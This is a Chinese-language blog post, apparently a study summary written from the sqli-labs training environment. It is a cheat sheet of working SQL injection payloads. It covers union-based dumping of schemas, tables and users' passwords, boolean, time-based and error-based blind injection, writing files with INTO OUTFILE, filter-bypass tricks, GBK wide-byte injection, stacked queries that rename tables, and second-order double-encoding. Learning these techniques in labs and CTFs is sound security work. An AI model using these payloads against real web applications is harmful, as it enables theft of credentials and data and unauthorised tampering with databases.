<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="敢于去想，才会有MEteor的光芒闪耀。">
    

    <!--Author-->
    
        <meta name="author" content="Peguin">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="sqli"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="敢于去想，才会有MEteor的光芒闪耀。" />
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Hexo"/>

    <!--Type page-->
    
        <meta property="og:type" content="article" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>sqli - Hexo</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 4.2.0"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2020/01/13/sqli/">
                sqli
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2020-01-13</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <p>根据sqli-labs上的教学做了一个sql用法的总结</p>
<a id="more"></a>

<h4 id="1-union联合查询"><a href="#1-union联合查询" class="headerlink" title="1.union联合查询"></a>1.union联合查询</h4><p>union的作用是将两个sql语句进行联合</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">?id=-1'union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(schema_name),<span class="number">3</span> <span class="keyword">from</span> information_schema.schemata<span class="comment">#</span></span><br><span class="line">此时的<span class="keyword">sql</span>语句为<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> <span class="keyword">users</span> <span class="keyword">WHERE</span> <span class="keyword">id</span>=<span class="string">'-1'</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(schema_name),<span class="number">3</span> <span class="keyword">from</span> information_schema.schemata<span class="comment">--+ LIMIT 0,1 </span></span><br><span class="line">接着下一步就是爆数据表</span><br><span class="line">?<span class="keyword">id</span>=<span class="number">-1</span><span class="string">'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = '</span><span class="keyword">security</span><span class="string">'#</span></span><br><span class="line"><span class="string">通过这一步可以得到表名，接着来爆出表的列</span></span><br><span class="line"><span class="string">?id=-1'</span><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">group_concat</span>(column_name),<span class="number">3</span> <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name = <span class="string">'users'</span><span class="comment">#</span></span><br><span class="line">最后就是爆数据了，根据上一步可以看到这个表中有什么列值，根据需要来爆</span><br><span class="line">?<span class="keyword">id</span>=<span class="number">-1</span><span class="string">'union select 1,username,password from users where id = 2#</span></span><br></pre></td></tr></table></figure>

<p>根据注入时的提示，可以判断注入的形式，可能是?id=1’),?id=1”)。</p>
<h3 id="2-盲注-下面的都是能使用的payload展示"><a href="#2-盲注-下面的都是能使用的payload展示" class="headerlink" title="2.盲注:(下面的都是能使用的payload展示)"></a>2.盲注:(下面的都是能使用的payload展示)</h3><p>1’:基于布尔SQL盲注</p>
<p>2’:基于时间的SQL盲注</p>
<p>3’:基于报错的SQL盲注</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">布尔注入</span><br><span class="line">利用left(database(),1)</span><br><span class="line">?id=1'and <span class="keyword">select</span> <span class="keyword">left</span>(<span class="keyword">version</span>(),<span class="number">1</span>)=<span class="number">5</span><span class="comment">#可以查看版本号的首位字</span></span><br><span class="line">利用<span class="keyword">substr</span>(a,b,c),从第b位开始取出a中长度为c的子串</span><br><span class="line">?<span class="keyword">id</span>=<span class="number">1</span><span class="string">'and ascii(substr(select table_name from information_schema.tables where table_schema=database()limit0,1),1,1)=113#</span></span><br><span class="line"><span class="string">利用regexp正则匹配</span></span><br><span class="line"><span class="string">?id=1'</span><span class="keyword">and</span> <span class="number">1</span>=(<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span> <span class="keyword">and</span> column_name regexp <span class="string">'^userame'</span><span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>)<span class="comment">#</span></span><br><span class="line">利用<span class="keyword">ord</span>()和<span class="keyword">mid</span></span><br><span class="line">?<span class="keyword">id</span>=<span class="number">1</span><span class="string">'and ord(mid(select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1)=68#</span></span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">报错注入</span><br><span class="line">?id=1'union <span class="keyword">select</span> <span class="number">1</span>,<span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="number">0x3a</span>,<span class="number">0x3a</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x3a</span>,<span class="number">0x3a</span>,<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))a <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> a<span class="comment">--+</span></span><br><span class="line">利用<span class="built_in">bigint</span>溢出</span><br><span class="line">?<span class="keyword">id</span>=<span class="number">1</span><span class="string">'union select(!(select * from (select user())x)-~0),2,3#</span></span><br><span class="line"><span class="string">xpath函数报错注入</span></span><br><span class="line"><span class="string">?id=1;and extractvalue(1,concat(0x7e,(select @@version),0x7e))#</span></span><br><span class="line"><span class="string">updatexml</span></span><br><span class="line"><span class="string">?id=1'</span><span class="keyword">and</span> updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> @@<span class="keyword">version</span>),<span class="number">0x7e</span>),<span class="number">1</span>)<span class="comment">#</span></span><br><span class="line">利用数据重复性</span><br><span class="line">?<span class="keyword">id</span>=<span class="number">1</span><span class="string">'union select 1,2,3 from (select name_const(version(),1),name_const(version(),1))x#</span></span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">延时注入</span><br><span class="line">利用sleep()函数进行注入</span><br><span class="line">?id=1'and if(ascii(substr(database(),1,1))=115,1,sleep(5))<span class="comment">#(若有错误时有5秒时间延时)</span></span><br><span class="line">利用benchmark()进行延时注入</span><br><span class="line">?id=1' union <span class="keyword">select</span>(<span class="keyword">if</span>(<span class="keyword">substring</span>(<span class="keyword">current</span>,<span class="number">1</span>,<span class="number">1</span>)=<span class="built_in">char</span>(<span class="number">115</span>),<span class="keyword">benchmark</span>(<span class="number">50000000</span>,<span class="keyword">encode</span>(<span class="string">'MSG'</span>,<span class="keyword">by</span> <span class="number">5</span> <span class="keyword">seconds</span>)),<span class="literal">null</span>)),<span class="number">2</span>,<span class="number">3</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">database</span>() <span class="keyword">as</span> <span class="keyword">current</span>)<span class="keyword">as</span> tb1<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<h4 id="3-导入导出"><a href="#3-导入导出" class="headerlink" title="3.导入导出"></a>3.导入导出</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1' union <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">"c:\\wamp\\www\\sqllib\\Less-7\\uuu.txt"</span><span class="comment">#</span></span><br></pre></td></tr></table></figure>



<p>addslashes() 函数返回在预定义字符之前添加反斜杠的字符串</p>
<p><strong>stripslashes()</strong> 函数删除由 addslashes() 函数添加的反斜杠</p>
<p><strong>mysql_real_escape_string()</strong> 函数转义 SQL 语句中使用的字符串中的特殊字符</p>
<p>如何绕过or和and过滤：</p>
<p>1.大小写变形 Or,OR,oR</p>
<p>2.编码，hex，urlencode</p>
<p>3.添加注释/<em>or</em>/</p>
<p>4.利用符号 and=&amp;&amp; or=||</p>
<p>%09 TAB键（水平） </p>
<p>%0a 新建一行 </p>
<p>%0c 新的一页 </p>
<p>%0d return功能 </p>
<p>%0b TAB键（垂直） </p>
<p>%a0 空格 </p>
<h4 id="4-宽字节注入"><a href="#4-宽字节注入" class="headerlink" title="4.宽字节注入"></a>4.宽字节注入</h4><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">原理：mysql在使用GBK编码的时候，会认为两个字符为一个汉字，例如%aa%5c就是一个汉字（前一个ascii码大于128才能到汉字的范围）。我们在过滤 ' 的时候，往往利用的思路是将 ' 转换为 \' </span><br><span class="line"></span><br><span class="line"> 1.%df吃掉 \ 具体的原因是urlencode('\) = %5c%27，我们在%5c%27前面添加%df，形成%df%5c%27，而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字，此事%df%5c就是一个汉字，%27则作为一个单独的符号在外面，同时也就达到了我们的目的。</span><br><span class="line"> 2.将 \' 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27的情况，后面的%5c会被前面的%5c给注释掉。这也是bypass的一种方法。</span><br></pre></td></tr></table></figure>

<h4 id="5-堆叠注入"><a href="#5-堆叠注入" class="headerlink" title="5.堆叠注入"></a>5.堆叠注入</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">return preg_match("/<span class="keyword">select</span>|<span class="keyword">update</span>|<span class="keyword">delete</span>|<span class="keyword">drop</span>|<span class="keyword">insert</span>|<span class="keyword">where</span>|\./i<span class="string">",$inject);过滤了括号内的东西</span></span><br><span class="line"><span class="string">?a=1#返回正常</span></span><br><span class="line"><span class="string">堆叠查询 id=1';show databases;'爆出数据库内容</span></span><br><span class="line"><span class="string">id=1';show tables;'爆出所有表名</span></span><br><span class="line"><span class="string">/?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;%23</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">set sql_mode=pipes_as_concat;的作用为将||的作用由or变为拼接字符串</span></span><br></pre></td></tr></table></figure>

<h4 id="6-二次注入"><a href="#6-二次注入" class="headerlink" title="6.二次注入"></a>6.二次注入</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/1.php?id=%2527,第一次解码的结果为id=1%27,%25解码为%,如果使用了urldecode或者rawurldecode来解码id参数，结果为id=1'单引号成功出现引发注入.</span><br></pre></td></tr></table></figure>

<p>用hex先将字符转换成16进制，然后用CONV函数将16进制转化为10进制</p>

    </div>

    

    
        <div class="post-tags">
            <i class="fa fa-tags" aria-hidden="true"></i>
            <a href="/tags/sql总结/">#sql总结</a>
        </div>
    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a href="https://github.com/klugjo" target="_blank" rel="noopener">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2020/05/05/ctfshow/">ctfshow</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2020/04/29/XMCTF/">XMCTF</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2020/03/29/BJD2MRCTF/">BJD2MRCTF</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2020/03/14/%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/">信息泄露</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a href="https://github.com/klugjo/hexo-theme-alpha-dust" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="https://twitter.com/?lang=en" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="https://www.facebook.com/" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="https://www.instagram.com/" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="https://dribbble.com/" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="https://plus.google.com/" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-google-plus"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="https://www.behance.net/" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="https://500px.com/" target="_blank" rel="noopener">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a href="http://www.codeblocq.com/" target="_blank" rel="noopener">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>